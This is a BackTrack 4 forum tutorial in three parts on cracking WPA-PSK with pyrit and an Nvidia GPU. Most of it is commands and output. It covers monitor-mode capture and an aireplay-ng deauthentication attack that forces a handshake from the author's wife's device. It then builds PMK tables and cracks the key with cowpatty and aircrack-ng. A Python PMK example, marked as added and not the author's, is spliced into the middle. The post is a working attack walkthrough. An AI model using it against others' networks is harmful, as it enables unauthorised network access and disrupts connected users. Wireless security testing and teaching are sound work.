pyrit CUDA nvidia Tutorial + Nvidia overclock instructions
OK, so here we are with a fresh new release, and let's be honest, we want to see something new. Well, this is one of BT4's new exciting features:
WPA hash table generation using CUDA/Nvidia GPU power.
First thing to do is check whether your card is supported for this technology: http://en.wikipedia.org/wiki/CUDA#Supported_GPUs
So let's get started...
I'm going to assume that if you're reading this you have no clue what you're doing, so I will try to go from A to Z on this.
So let's boot our disk, and when we get to the framebuffer console prompt (that's before you startx) we are going to install the nvidia kernel module.
Code:
root@bt:~# cd /opt/cuda/
root@bt:/opt/cuda# ls
CUDA_INSTALL cuda-set-env.sh nv_20090130-1_i386.deb
root@bt:/opt/cuda# bash CUDA_INSTALL
You will get some output and then be asked whether to overwrite your current xorg.conf. Take the default here, which is no.
Next, let's load the driver module.
Code:
root@bt:~# modprobe nvidia
root@bt:~# depmod -a
OK, so that's done. Now, since we've totally borked our xorg.conf, we should generate a new one.
Code:
root@bt:~# X -configure
That will save the new one in /root, and we will have to copy it over by hand.
Code:
root@bt:~# cp xorg.conf.new /etc/X11/xorg.conf
At this point we should be able to either startx or use the new bt4-crystal window manager. (Shameless plug for me and j0rgan here.)
OK, so if everything went well you are looking at your desktop.
Now, before we get to cracking, pyrit has a benchmark utility we can use to see if we are good to go.
Code:
root@bt:/pentest/password/pyrit# python pyrit.py benchmark
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
The ESSID-blobspace seems to be empty; you should create an ESSID...
Available cores: 'Standard CPU', 'Nvidia CUDA'
Testing CPU-only core 'Standard CPU' (4 CPUs)... 1294.58 PMKs/s
Testing GPU core 'Nvidia CUDA' (Device 'GeForce 8800 GT')... 5409.43 PMKs/s
As you can see, my 8800 GT is roughly 5 times faster than my Q6600 quad-core chip running at 3.6 GHz.
OK, swell, so that works. Now what we need is a .cap file. I'm assuming everyone can do this, but I will show it anyway.
Code:
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~# airodump-ng -w cudacapture mon0
OK, so let's do a little scan of my house.
http://img7.imageshack.us/img7/844/snapshot4fo4.th.png
As you can see, I have 2 dd-wrt routers on at the moment, and my wife is connected to ddwrt1 feeding her new Facebook addiction.
Let's deauth her a$$
Code:
root@bt:~# aireplay-ng -0 10 -a 00:1d:7e:f0:a5:8f -c 00:13:02:a7:dd:53 mon0
01:13:28 Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
01:13:29 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
01:13:30 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
01:13:31 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:32 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:33 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
01:13:34 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:35 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:36 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
01:13:37 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
01:13:38 Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
Now let's check for success.
Code:
root@bt:~# aircrack-ng cudacapture-01.cap
Opening cudacapture-01.cap
Read 5612 packets.
# BSSID ESSID Encryption
1 00:1D:7E:F0:A5:8F ddwrt1 WPA (1 handshake)
2 00:1D:7E:64:9A:7C ddwrt2 WPA (0 handshake)
3 00:21:29:84:11:FD CookNet WEP (34 IVs)
4 00:0C:41:3E:2D:66 linksys None (192.168.1.1)
5 00:12:0E:7B:02:78 WEST7359 No data - WEP or WPA
6 00:1A:70:83:B0:1C linksys None (0.0.0.0)
7 00:13:46:44:A5:CE default WEP (11 IVs)
8 00:14:6C:F6:36:78 CBC None (0.0.0.0)
9 00:06:25:DB:3E:7B linksys None (0.0.0.0)
10 00:1B:2F:63:7C:50 PawsWithPurpose No data - WEP or WPA
11 00:21:29:9A:E6:3C Bigfoot No data - WEP or WPA
12 00:1C:10:89:16:76 linksys None (0.0.0.0)
Index number of target network ?
Looks like we got one.
I'm going to start a new post for part 2
pyrit CUDA nvidia Tutorial part 2
Okay, so we got a handshake. Now what?
First off we need to grab a dictionary file.
Code:
root@bt:~# wget http://www.outpost9.com/files/wordlists/dic-0294.zip
--2009-02-11 01:17:53-- http://www.outpost9.com/files/wordlists/dic-0294.zip
Resolving www.outpost9.com... 12.180.200.208
Connecting to www.outpost9.com|12.180.200.208|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3283473 (3.1M) [application/zip]
Saving to: `dic-0294.zip'
100%[=============================================================================================================>] 3,283,473 268K/s in 9.2
root@bt:~# unzip dic-0294.zip
Archive: dic-0294.zip
inflating: dic-0294.txt
Then we need to strip out the stuff we don't need.
Code:
root@bt:~# cat dic-0294.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.lst
root@bt:~# wc -l wpa.lst
597532 wpa.lst
So, about six hundred thousand words.
Now we've got a file to work with. Now for the fun part.
Code:
root@bt:~# cd /pentest/password/pyrit/
root@bt:/pentest/password/pyrit#
Add our ESSID
Code:
root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 create_essid
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Created ESSID 'ddwrt1'
Import our new WPA list
Code:
root@bt:/pentest/password/pyrit# python pyrit.py -f /root/wpa.lst import_passwords
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Importing from '/root/wpa.lst'
597532 lines read. All done.
And start the table generation
Code:
root@bt:/pentest/password/pyrit# python pyrit.py batchprocess
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Using default core 'Nvidia CUDA' (Device 'GeForce 8800 GT')
Working on ESSID 'ddwrt1'
Reading unit '1ec5841a057928e33972489b461cb914' (54072 passwords buffered)
All done, computed 54072 PMKs in 10.47 seconds, 5164.13 PMKs/s)
Reading unit '6c9303c848ed6a4473221229d4387934' (54996 passwords buffered)
All done, computed 54996 PMKs in 10.79 seconds, 5099.30 PMKs/s)
Reading unit '70ded804144475dbc58b982625483821' (56076 passwords buffered)
All done, computed 56076 PMKs in 10.74 seconds, 5223.29 PMKs/s)...
...Reading unit 'f384ca460307a079503db313ece6806e' (53808 passwords buffered)
All done, computed 53808 PMKs in 10.67 seconds, 5044.67 PMKs/s)
Reading unit '1bf464713cab79da5efc8503e8f28812' (17496 passwords buffered)
All done, computed 17496 PMKs in 3.23 seconds, 5422.30 PMKs/s)
Batchprocessing done.
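To show what pyrit is actually computing in the import and batchprocess steps above (and why the pw-inspector step earlier keeps only words of 8 to 63 characters), here is an added Python example; it is not pyrit's code, and the sample wordlist is constructed. WPA-PSK derives the PMK with PBKDF2-HMAC-SHA1 over the passphrase, salted with the ESSID, so a precomputed table is only useful against the one ESSID it was built for.

```python
import hashlib

# WPA/WPA2-PSK derives the PMK with PBKDF2-HMAC-SHA1, salted with the ESSID,
# 4096 iterations, 256-bit output (IEEE 802.11i). This is the per-ESSID work
# pyrit precomputes; this example is added here and is not pyrit's code.
WPA_ITERATIONS = 4096
PMK_LEN = 32


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """Compute the Pairwise Master Key for one passphrase/ESSID pair."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode(), essid.encode(), WPA_ITERATIONS, PMK_LEN
    )


def filter_wordlist(lines):
    """Mirror of the 'sort | uniq | pw-inspector -m 8 -M 63' step: keep unique
    candidates of legal WPA passphrase length (8..63 characters)."""
    words = {w.rstrip("\r\n") for w in lines}
    return sorted(w for w in words if 8 <= len(w) <= 63)


def build_pmk_table(essid: str, words):
    """Precompute PMKs for one ESSID, the way pyrit's batchprocess does."""
    return {w: wpa_pmk(w, essid) for w in words}


# Constructed sample wordlist (not the dic-0294 list from the post).
SAMPLE_WORDS = ["short", "metasploit", "metasploit", "Passibleness123", "x" * 64]

if __name__ == "__main__":
    words = filter_wordlist(SAMPLE_WORDS)  # -> ['Passibleness123', 'metasploit']
    t1 = build_pmk_table("ddwrt1", words)
    t2 = build_pmk_table("ddwrt2", words)
    # Same passphrase, different ESSID -> different PMK: the ESSID is the salt,
    # so a table built for ddwrt1 says nothing about ddwrt2, and a non-default
    # ESSID plus a long passphrase is what defeats precomputed tables.
    print(t1["metasploit"] != t2["metasploit"])  # -> True
    # IEEE 802.11i Annex test vector: passphrase "password", SSID "IEEE"
    print(wpa_pmk("password", "IEEE").hex())
```

The final line prints the standard test vector PMK, which is a quick way to confirm any PMK implementation before trusting a table built with it.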
So if everything went well, you are at this point. Pyrit can export to cowpatty or airolib-ng files. For the sake of this tutorial I will be using cowpatty because I've found it's faster.
So let's make our cowpatty file.
Code:
root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f cow.out export_cowpatty
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Exporting to 'cow.out'...
4656218 entries written. All done.
Okay, so let's see how fast this will go.
Code:
root@bt:~# cd /pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty/
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ls
AUTHORS COPYING cowpatty.h eap-test.dump fpga.c genpmk.c Makefile md5.o sha1.c TODO utils.o
CHANGELOG cowpatty cowpatty.o FAQ fpga.o genpmk.o md5.c radiotap.h sha1.h utils.c wpa2psk-linksys.dump
common.h cowpatty.c dict file_magic genpmk INSTALL md5.h README sha1.o utils.h wpapsk-linksys.dump
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty
cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
cowpatty: Must supply a list of passphrases in a file with -f or a hash file
with -d. Use "-f -" to accept words on stdin.
Usage: cowpatty [options]
-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-F card Use FPGA acceleration
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -d /pentest/password/pyrit/cow.out -s ddwrt2 -r /root/cudacapture-01.cap
cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: Mathboldit1
key no. 2000: llegando2
key no. 3000: shougakukan123
key no. 4000: DISGUISING
key no. 5000: Graffaloy
key no. 6000: Passibleness123
key no. 7000: Unmaking2
key no. 8000: Procanal123
So this is the cracking process...
Code:
4656217 passphrases tested in 24.84 seconds: 187468.86 passphrases/second
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty#
And just to show you what it would be like without the hash file...
Code:
root@bt:/pentest/password/oc-v0.7/cowpatty-v4.3/cowpatty# ./cowpatty -f /root/wpa.lst -s ddwrt2 -r /root/cudacapture-01.cap
27824 passphrases tested in 84.98 seconds: 327.40 passphrases/second
That's a HUGE difference.
pyrit CUDA nvidia Tutorial part 3
So you would rather use the airolib-ng option because you love aircrack. That can be done as well, like this...
Back up to right before we created the cow.out table and use these commands instead.
Create the database (pyrit won't do it for you for some reason).
Code:
root@bt:/pentest/password/pyrit# airolib-ng testdb -import essid ddwrt1
Database <testdb> does not already exist, creating it...
Database <testdb> sucessfully created
Could not open file/stream for reading.
Then output to our newly created database.
Code:
root@bt:/pentest/password/pyrit# python pyrit.py -e ddwrt1 -f testdb export_hashdb
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3
Exporting ESSID 'ddwrt1'
Okay... this takes a little longer than the cowpatty tables due to the SQL stuff, but the advantage of airolib-ng is that it can use HUGE files, while I think cowpatty fails with hash files over 2 gigs.
Once it's done we can use aircrack.
Code:
root@bt:/pentest/password/pyrit# aircrack-ng -r testdb /root/cudacapture-01.cap
Opening /root/cudacapture-01.cap
Read 10561 packets.
# BSSID ESSID Encryption
1 00:1D:7E:F0:A5:8F ddwrt1 WPA (1 handshake)
2 00:1D:7E:64:9A:7C ddwrt2 WPA (0 handshake)
3 00:21:29:84:11:FD CookNet WEP (93 IVs)
4 00:0C:41:3E:2D:66 linksys None (192.168.1.1)
5 00:12:0E:7B:02:78 WEST7359 No data - WEP or WPA
6 00:1A:70:83:B0:1C linksys None (192.168.1.1)
7 00:13:46:44:A5:CE default WEP (28 IVs)
8 00:14:6C:F6:36:78 CBC None (0.0.0.0)
9 00:06:25:DB:3E:7B linksys None (0.0.0.0)
10 00:1B:2F:63:7C:50 PawsWithPurpose No data - WEP or WPA
11 00:21:29:9A:E6:3C Bigfoot No data - WEP or WPA
12 00:1C:10:89:16:76 linksys None (0.0.0.0)
13 00:18:3A:3A:B2:B5 No data - WEP or WPA
14 00:12:0E:6E:FE:6B WEST3306 No data - WEP or WPA
Index number of target network ? 1
Select the network and let her rip.
Code:
Aircrack-ng 1.0 rc2 r1385
[00:00:38] 4315315 keys tested (112595.70 k/s)
KEY FOUND! [ metasploit ]
Master Key : F4 AB C6 2A 18 F8 89 9B 6A 70 3D 5F EB 0D F4 F9
F8 F8 51 48 25 3E C3 61 EA 54 17 3D D3 84 18 AC
Transient Key : 11 A0 36 8F 96 63 64 7F 63 A1 08 35 73 82 96 AE
49 E1 BE 68 F7 7E 8D 98 57 28 C2 E1 DE AC F2 AC
68 00 43 B9 88 8E 96 57 7A BF E2 62 DB DE 6A 1B
BF 53 10 26 D1 D8 32 47 BC A6 F5 86 F1 83 23 11
EAPOL HMAC : 68 AE A8 82 57 7C 3D 89 6E BC BD C1 46 8E 34 AD
Quitting aircrack-ng...
Well, that's it! Thanks for listening/reading.